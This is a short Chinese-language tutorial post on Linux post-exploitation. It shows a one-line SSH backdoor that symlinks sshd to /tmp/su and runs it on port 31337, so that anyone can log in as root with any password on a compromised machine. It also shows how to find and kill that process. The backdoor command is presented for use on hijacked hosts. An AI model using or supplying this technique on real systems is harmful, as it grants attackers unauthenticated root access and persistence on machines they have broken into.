1. 程式人生 > >linux 後滲透測試

linux 後滲透測試

1. SSH滲透技巧

1.1 ssh 臨時後門

入侵得到SHELL後,對方防火牆沒限制,想快速開放一個可以訪問的SSH埠肉雞上執行

myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

就會派生一個31337埠,然後連線31337,用root/bin/ftp/mail當用戶名,密碼隨意,就可登陸。效果圖:

ssh_backdoor

1.2 如何殺死ssh臨時後門

臨時後門生成後,如果我們需要殺死這個程序,請使用以下語句。

myles@localhost# ps -ef |grep 31337  #查詢後門程序ID
myles@localhost
# kill -9 ssh_pid #使用kill -9 直接殺死程序

kill_ssh_backdoor